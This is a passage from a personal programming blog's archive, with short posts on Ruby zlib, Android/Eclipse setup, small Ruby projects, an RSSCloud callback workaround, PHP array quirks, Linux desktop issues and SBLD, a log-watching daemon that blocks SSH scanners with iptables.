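If you don't have Erlang-produced data handy, you can check the behavior with a round trip entirely in Ruby. The helper names below are made up for illustration; passing negative window bits to `Zlib::Deflate.new` produces the same kind of headerless stream.

```ruby
require "zlib"

# Produce raw deflate data (no zlib header or checksum) via negative window bits.
def raw_deflate(string)
  z = Zlib::Deflate.new(Zlib::DEFAULT_COMPRESSION, -Zlib::MAX_WBITS)
  z.deflate(string, Zlib::FINISH)
ensure
  z.close if z
end

# Inflate raw deflate data, following the same steps as the snippet above.
def raw_inflate(string)
  z = Zlib::Inflate.new(-Zlib::MAX_WBITS)
  out = z.inflate(string)
  z.finish
  out
ensure
  z.close if z
end

raw = raw_deflate("hello " * 100)
raw_inflate(raw)
```

Handing the same raw bytes to plain `Zlib::Inflate.inflate`, which expects a zlib header, raises `Zlib::DataError`; that's usually the symptom that sends people looking for this option.
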
23:09 < justin> Erlang tattoo might be cool
23:09 < justin> not many have those
23:10 < justin> not even sure what that would look like
23:10 < aphyr_> Yeah, really gonna add to my aura of mysterious sexiness
23:10 < aphyr_> "What's that?"
23:10 < aphyr_> "Oh, that's Erlang. It's a distributed functional programming language."
23:10 < justin> Mad tail
23:10 < aphyr_> "Tell me, would you and your friends like to do it... concurrently?"
23:13 < aphyr_> "Oh sorry. You're not my... TYPE."
23:13 < aphyr_> DAMN YOOOOUUU STATIC COMPILERS!

Things are getting a little slap-happy here in the final hours before Showyou launch.

I just built a Chrome extension for Vodpod.com. It builds off of the high-performance API I wrote last year, and offers some pretty sweet unread-message synchronization. You'll get desktop notifications when someone you know collects a video, in addition to a miniature version of your feed.

As it turns out, Chrome is really great to develop for. Everything just works, and it works pretty much like the standard says it should. Local storage, JSON, inter-view communication, notifications... all dead simple. Props to the Chrome/Chromium teams!

Here's the quickest way I know to get Eclipse up and running with the Android SDK plugin. To install each of these packages, go to Help->Install New Software, add the given URI as a package source, and install the given package. Eclipse may prompt you to restart after some installs.

Source                                                      Package
http://download.eclipse.org/tools/gef/updates/releases/     GEF SDK
http://download.eclipse.org/modeling/emf/updates/releases/  EMF SDK 2.5.0 (EMF + XSD)
http://download.eclipse.org/webtools/updates                Web Tools Platform / Eclipse XML Editors and Tools
https://dl-ssl.google.com/android/eclipse/                  Developer Tools

That should do it for you!

$ adb devices
List of devices attached
????????????    no permissions

A few things have changed since the Android docs were written. If you want to talk to your Motorola Droid via ADB in Ubuntu 9.10 Karmic, I recommend the following udev rule.

# /etc/udev/rules.d/99-android.rules
SUBSYSTEM=="usb", ATTRS{idVendor}=="22b8", SYMLINK+="android_adb", MODE="0666", GROUP="plugdev"

Restart udev, unplug and re-plug the device, and it should show up! Make sure USB debugging is enabled on your droid.

$ sudo restart udev
$ adb devices
List of devices attached
0403681F17009017    device

If that doesn't work, try restarting the adb server:

$ adb kill-server
$ nohup adb start-server

Yamr

Sometime in the last couple of weeks, the Yammer AIR client stopped fetching new messages. I've grown to really like the service, especially since it delivers a running stream of commits to the Git repos I'm interested in, so I broke down and wrote my own client.

Yamr is a little Ruby/GTK app built on top of jstewart's yammer4r and the awesome danlucraft's Ruby Webkit-GTK+ bindings. No seriously, Dan, you rock.

Features

  • Reads messages
  • Posts messages
  • OAuth support
  • Notifies you using libnotify, instead of that awful AIR thing.

Anyway, feel free to fork & hack away. You should be able to build ruby-webkit without much trouble on Ubuntu; I've included directions in the readme. It's super-basic right now, but the core is in good enough shape to start adding features. Enjoy!

All right boys and girls, I'm all for quality releases and everything, but Cortex Reaver 0.2.0 is raring to go. Just gem update to get some awesome blogging goodness.

I threw together a little jQuery tag editor last weekend for Cortex Reaver, since hours of Google searching turned up, well, not much. Feel free to try the demo and use it for your projects.

A bit of context, in case you haven't been keeping up with the real-time web craze:

RSSCloud is an... idea* for getting updates on RSS feeds to clients faster, while decreasing network load. In traditional RSS models, subscribers make an HTTP request every 10 minutes or so to a publisher to check for updates. In RSSCloud, a cloud server aggregates several feeds from authors. When a feed changes, its author sends an HTTP request to the cloud server notifying it of the update. The cloud server then contacts each subscriber of the feed, sending a notice that the feed has changed. The subscribers then request the feed from the author. Everyone gets their updates faster, and with fewer requests across the network.

The Problem

When you subscribe to an RSSCloud server, you tell it several things about how to notify you of changes:

  1. A SOAP/XML-RPC notify procedure (required but useless for REST)
  2. What port to call back on.
  3. What path to make the request to.
  4. The protocol you accept (XML-RPC, SOAP, or HTTP POST).
  5. The URLs of the feeds to subscribe to.

There's something missing! The RSSCloud walkthrough says:

Notifications are sent to the IP address the request came from. You can not request notification on behalf of another server.

That's great unless your originating IP address can't receive HTTP traffic. That rules out users behind a NAT or behind a firewall (without forwarded ports). That's most home users with routers, users on typical corporate networks, etc. It won't work on the iPhone. And, to a lesser degree, it rules out the cloud itself.

One of the common aspects of cloud computing is that compute nodes (and their IP addresses) may come and go as needed. For example, Vodpod.com is served by several different servers which (through a combination of heartbeat-failover, IP routing, and HTTP proxying) may enter and leave the cluster at any time without service interruption. So, if one of those servers subscribes to a feed, it might not be online to receive pings later. You'd have to subscribe to each feed from every host to guarantee that you'd continue to receive responses. The problem only becomes worse when you start looking at cloud services like EC2.

The RSSCloud mailing list has been tossing around the obvious solution for several weeks now: just include a "domain" parameter which says what FQDN or IP address to connect to. On Friday, Dave Winer included it in his walkthrough. Even so, most of the cloud servers (Wordpress, for example) out there don't support it yet.
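To make the addressing problem concrete, here's a toy in-memory model of how a cloud server might pick its callback address. This is a sketch, not any real RSSCloud implementation: the ToyCloud class, its method names, and its keyword arguments are all invented for illustration, and the addresses are placeholders.

```ruby
# Toy model of RSSCloud callback addressing. Everything here is hypothetical;
# real servers differ in parameter names and protocols.
class ToyCloud
  def initialize
    @callbacks = Hash.new { |hash, feed| hash[feed] = [] }
  end

  # remote_ip: the address the subscription request arrived from.
  # domain:    optional override, as proposed on the mailing list.
  # Returns the callback URL the server would notify later.
  def subscribe(remote_ip:, port:, path:, feeds:, domain: nil)
    callback = "http://#{domain || remote_ip}:#{port}#{path}"
    feeds.each { |feed| @callbacks[feed] << callback }
    callback
  end

  # An author pinged us about a changed feed: list who to notify.
  def ping(feed)
    @callbacks.key?(feed) ? @callbacks[feed].dup : []
  end
end

cloud = ToyCloud.new
feed = 'http://example.com/feed.xml'

# Without a domain, the server can only call back the address it saw,
# which behind a NAT is the router rather than the subscriber.
puts cloud.subscribe(remote_ip: '203.0.113.7', port: 8080,
                     path: '/rsscloud', feeds: [feed])

# With a domain, the subscriber names a reachable host explicitly.
puts cloud.subscribe(remote_ip: '203.0.113.7', port: 8080,
                     path: '/rsscloud', feeds: [feed],
                     domain: 'callbacks.example.com')
```

The second form is also what a cluster wants: the callback can point at a stable name instead of whichever node happened to send the subscription.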

A Partial Solution

What can you do to get around this?

One solution is to use PubSubHubbub, which uses a full callback URL. Additionally, Superfeedr will even use RSSCloud to offer real-time updates through PuSH, effectively bridging the two schemes.

Alternatively, you can lie (sort of) about your address. This is what we've done at Vodpod to get Wordpress to call us back correctly. When we subscribe, we actually re-bind the TCP socket to a publicly accessible IP. That IP is guaranteed to go somewhere in the cluster which can accept the RSSCloud update ping. Here's a truly evil hack to do just that, by replacing Net::HTTP's TCP socket with our own.

res = Net::HTTP.new(uri.host, uri.port).start do |http|
  # Replace the socket with one that we bind to the interface we want to use.

  # The local IP address we'd like RSSCloud to call back.
  local_addr = Socket.pack_sockaddr_in 0, '208.101.30.10'

  # The RSSCloud server IP address
  remote_addr = Socket.pack_sockaddr_in uri.port, uri.host

  # Create a new socket
  s = Socket.new Socket::AF_INET, Socket::SOCK_STREAM, 0

  # Bind it to the local address
  s.bind local_addr

  # Wrap for Net::HTTP and connect
  socket = Net::BufferedIO.new(s)
  s.connect remote_addr

  # Replace the HTTP client's connection
  http.instance_variable_set('@socket', socket)

  # And make the request
  http.request(req)
end
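For anyone on a newer Ruby (2.0 and later, as far as I know), Net::HTTP has local_host and local_port accessors that ask it to bind the outgoing socket for you, which may make the socket swap unnecessary. A minimal sketch, assuming such a Ruby: the bound_client helper and the example URL are made up, and 208.101.30.10 is simply the address from the hack above.

```ruby
require 'net/http'
require 'uri'

# Hypothetical helper: build an HTTP client whose outgoing connection will be
# bound to local_ip. Nothing connects until the client is started.
def bound_client(uri, local_ip)
  http = Net::HTTP.new(uri.host, uri.port)
  http.local_host = local_ip
  http
end

uri = URI.parse('http://cloud.example.com/subscribe')
http = bound_client(uri, '208.101.30.10')
puts http.local_host

# To actually send a subscription request (req built elsewhere):
#   http.start { |conn| conn.request(req) }
```

The bind only succeeds if the address really is assigned to an interface on the machine making the request, same as with the manual version.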

*Dave says it's not a standard, or a spec. As far as I can tell, RSSCloud consists of a mailing list, a walkthrough of how implementations can handle the pings/cloud tag in RSS feeds, and a bunch of loosely federated implementations with varying degrees of compatibility. Some speak XML-RPC, some speak SOAP, some speak plain-old REST, etc...

Reading the PHP documentation has convinced me (again) of what a mind-bogglingly broken language this is. Quickly, see if you can predict this behavior:

<?php
echo "This is the integer literal octal 010: " . 010 . "\n\n";

$things = array(
  "The 0th element",
  "The 1st element",
  "The 2nd element",
  "The 3rd element",
  "The 4th element",
  "The 5th element",
  "The 6th element",
  "The 7th element",
  "The 8th element",
  "8" => "The element indexed by '8'",
  "foo" => "The element indexed by 'foo'",
  "010" => "The element indexed by '010'"
);

// The string index "8" clobbered the integer index 8.
// But the string index "010" didn't...
echo "Now check out what PHP thinks the array is...";
print_r ($things);
echo "\n\n";

// As expected
echo "\$things[0]: $things[0]\n";
echo "\$things[1]: $things[1]\n";

// Okay, so strings are interpreted as integers sometimes...
echo "\$things[\"0\"]: " . $things["0"] . "\n";

// Ah, now things become strange. This integer key gets the string "8" instead.
echo "\$things[8]: $things[8]\n";

// This should refer to the 8th element, but it gets converted to an integer by
// the preprocessor, then to a string, where it matches the clobbered 8th
// element...
echo "\$things[010]: " . $things[010] . "\n";

// This string key returns the expected "8" element...
echo "\$things[\"8\"]: " . $things["8"] . "\n";

// But this string octal key gets the "010" key as expected. Note that it
// *doesn't* get the integer 8, as you might expect from $things["0"]
echo "\$things[\"010\"]: " . $things["010"] . "\n";

echo "\n";
?>

Here's the output (PHP 5.2.6-3ubuntu4.1):

This is the integer literal octal 010: 8

Now check out what PHP thinks the array is...Array
(
    [0] => The 0th element
    [1] => The 1st element
    [2] => The 2nd element
    [3] => The 3rd element
    [4] => The 4th element
    [5] => The 5th element
    [6] => The 6th element
    [7] => The 7th element
    [8] => The element indexed by '8'
    [foo] => The element indexed by 'foo'
    [010] => The element indexed by '010'
)

$things[0]: The 0th element
$things[1]: The 1st element
$things["0"]: The 0th element
$things[8]: The element indexed by '8'
$things[010]: The element indexed by '8'
$things["8"]: The element indexed by '8'
$things["010"]: The element indexed by '010'

This is an excellent example of why grafting features onto your language piecemeal to satisfy users who can't be bothered to figure out whether they are working with strings or integers is a Bad Idea™.
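For what it's worth, the output above is consistent with the key-casting rule in the PHP manual: a string key that looks like a canonical decimal integer is stored as an integer, and anything else stays a string. Here's a rough Ruby emulation of that rule, just to trace the lookups. php_array_key is a made-up name, and the sketch ignores integer overflow, floats, booleans, and null.

```ruby
# Rough emulation of how PHP normalizes array keys (hypothetical helper).
# Canonical decimal strings such as "8" or "-3" become integers; strings with
# leading zeros ("010"), a plus sign, or any non-digits stay strings.
def php_array_key(key)
  return key unless key.is_a?(String)
  key.match?(/\A(?:0|-?[1-9][0-9]*)\z/) ? key.to_i : key
end

# Ruby also reads the literal 010 as octal, so it is the integer 8 here too.
[0, "0", 8, 010, "8", "010", "foo"].each do |key|
  puts "#{key.inspect} -> #{php_array_key(key).inspect}"
end
```

Under this rule 8, 010, and "8" all land on the integer key 8, which is why the ninth element gets clobbered, while "010" remains a distinct string key.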

I released version 0.1.3 of Construct today. It incorporates a few bugfixes for nested schemas, and should be fit for general use.

I got tired of writing configuration classes for everything I do, and packaged it all up in a tiny gem: Construct.

Highlights

OpenStruct-style access to key-value pairs.

config.offices = ['Sydney', 'Tacoma']

Nested structures are easy to handle.

config.fruits = {
  :banana => 'slightly radioactive',
  :apple => 'safe'
}
config.fruits.banana # => 'slightly radioactive'

Overridable, self-documenting schemas for default values.

config.define(:address, :default => '1 North College St')
config.address # => '1 North College St'
config.address = 'Urnud'
config.address # => 'Urnud'

Straightforward YAML saving and loading.

config.to_yaml; Construct.load(yaml)

Define whatever methods you like on your config.

class Config < Construct
  def fooo
    foo + 'o'
  end
end

It's available as a gem:

gem install construct

A few minutes ago, I realized my disk was paging when I ran Vim. Took a quick look at gkrellm, and yes, in fact, I was almost out of swap space, and physical memory was maxed out. The culprit was Firefox, as usual; firefox-bin was responsible for roughly a gigabyte of X pixmap memory.

So I spent some time digging, and realized that I'd had a window open to the Nagios status map for a few hours, which includes a 992 x 1021 pixel PNG. The page refreshes every minute or so. So I closed Firefox, brought up xrestop, opened the status map again, and watched. Sure enough, X pixmap usage for Firefox jumped up by about 2500K per refresh. In the last 10 minutes or so, that number has ballooned to roughly 50MB.

What gets me is that this is the same image being loaded again and again. It's not just the back-page cache--it looks like Firefox is keeping every image it loads in X memory, and it never goes away: closing the tab, closing the window, clearing the cache... it looks like nothing short of ending the process frees those pixmaps. :-(

I run Fluxbox as my primary window manager, and use gnome-settings-daemon to keep gnome apps happy and GTK-informed. Thus far, all has gone well. However, OpenOffice.org does something very funky to determine whether one is using KDE or GTK, finds neither on my system, and drops back to the horribly ugly interface of 1997.

I haven't figured out how to fix this yet, but running gnome-session sets up something which convinces OpenOffice to use the GTK theme. It doesn't appear to be an environment variable, because I can set my environment identically under gnome and fluxbox, with no difference in OO behavior. My guess is there's some sort of socket or temporary file set by gnome-session, but it's all a mystery and the source is obfuscated. If anyone knows of a way to force OpenOffice 2.0 to use GTK, I'd be interested to hear about it.

I just realized that aside from simple copies, the ALSA route_policy duplicate will mix to arbitrary numbers of output channels AND that such a device can use a Dmix PCM device as its slave. This means that it's possible to take 2 channel CD audio and have it mixed to 5.1 channel surround, and still let other applications use the sound card. This makes XMMS very happy.

On the other hand, my onboard i810 sound card reverses the surround and center channels, and it does some funky mixing on the center channel for the subwoofer, which sounds really messed up when played on the rear speakers. I haven't figured out how to compensate for this yet.

A useful ALSA FAQ can be found here: http://alsa.opensrc.org/faq/.

I wrote a quick script to analyze the logs generated by SBLD. You can pull them out of syslog, or (as I'm doing), have your log checker aggregate SBLD events for you. I'm making the statistics for my site available here, as a resource for others.

If you run a server with SSHD exposed to the internet, chances are that server is being scanned for common username and password combinations. These often appear in the authorization log (/var/log/auth.log) as entries like:

Jun 12 13:33:57 localhost sshd[18900]: Illegal user admin from 219.254.25.100
Jun 12 13:37:17 localhost sshd[18904]: Illegal user admin from 219.254.25.100
Jun 12 13:37:20 localhost sshd[18906]: Illegal user test from 219.254.25.100
Jun 12 13:37:22 localhost sshd[18908]: Illegal user guest from 219.254.25.100

Extend that for several hundred lines, and you'll have an idea of what one scan looks like.

Being somewhat opposed to the idea of people clogging my logs with useless information, I wrote a small Perl script to detect these entries in the log file and block the offending source address using iptables. It detects scans within a matter of seconds, and blocks the IP quickly to stop the attack. Blocks are only enabled for a short time--as little as 30 seconds is enough to discourage most automated scanners. SBLD limits the number of simultaneous bans to reduce iptables load and its own resource usage, and gradually decreases the alert level for hosts when no attack is taking place.

With SBLD, the scan is quickly detected and ended.

Jun 17 13:31:58 localhost sshd[3314]: Illegal user test from 209.76.72.12
Jun 17 13:31:59 localhost sshd[3316]: Illegal user test from 209.76.72.12
Jun 17 13:32:00 localhost sshd[3322]: Illegal user tester from 209.76.72.12
Jun 17 13:32:00 localhost sbld[3326]: Blocked 209.76.72.12
Jun 17 13:32:30 localhost sbld[3326]: Unblocked 209.76.72.12

The detection method itself is a simple regex applied to the log file, so it should be fairly easy to extend the daemon to block other kinds of attacks.
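Here's roughly what that detection loop looks like, sketched in Ruby rather than SBLD's Perl. This is not SBLD's code: the ToyDetector class, the pattern, the threshold of three hits, the ban cap, and the iptables arguments are all assumptions for illustration, and the sketch returns the command instead of running it. Timed unblocking is left out.

```ruby
# Illustrative only: not SBLD's actual regex, thresholds, or commands.
ILLEGAL_USER = /sshd\[\d+\]: Illegal user \S+ from (\d{1,3}(?:\.\d{1,3}){3})/

class ToyDetector
  attr_reader :blocked

  def initialize(threshold: 3, max_bans: 10)
    @threshold = threshold    # hits before a host is blocked (assumed)
    @max_bans  = max_bans     # cap on simultaneous bans (assumed)
    @levels    = Hash.new(0)  # per-host alert level
    @blocked   = []
  end

  # Feed one log line. Returns the iptables command (as an argument list)
  # that would block the host, or nil if no action is needed.
  def observe(line)
    match = ILLEGAL_USER.match(line)
    return nil unless match

    ip = match[1]
    @levels[ip] += 1
    return nil if @levels[ip] < @threshold
    return nil if @blocked.include?(ip) || @blocked.size >= @max_bans

    @blocked << ip
    %W[iptables -I INPUT -s #{ip} -j DROP]
  end

  # Call periodically: lower every alert level by one and forget quiet hosts.
  def decay
    @levels.keys.each { |ip| @levels[ip] -= 1 }
    @levels.delete_if { |_ip, level| level <= 0 }
  end
end

detector = ToyDetector.new
lines = [
  'Jun 17 13:31:58 localhost sshd[3314]: Illegal user test from 209.76.72.12',
  'Jun 17 13:31:59 localhost sshd[3316]: Illegal user test from 209.76.72.12',
  'Jun 17 13:32:00 localhost sshd[3322]: Illegal user tester from 209.76.72.12'
]
lines.each do |line|
  command = detector.observe(line)
  puts command.join(' ') if command
end
```

Swapping in a different pattern is all it takes to watch for another kind of log entry, which is the extension point mentioned above.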

SBLD is still under development, but I'd like to encourage people to try it out and/or offer improvements. I make no guarantees as to the performance, safety, or security of this software. Contact me with feedback.

Files

Copyright © 2012 Kyle Kingsbury.
Non-commercial re-use with attribution encouraged; all other rights reserved.
Comments are the property of respective posters.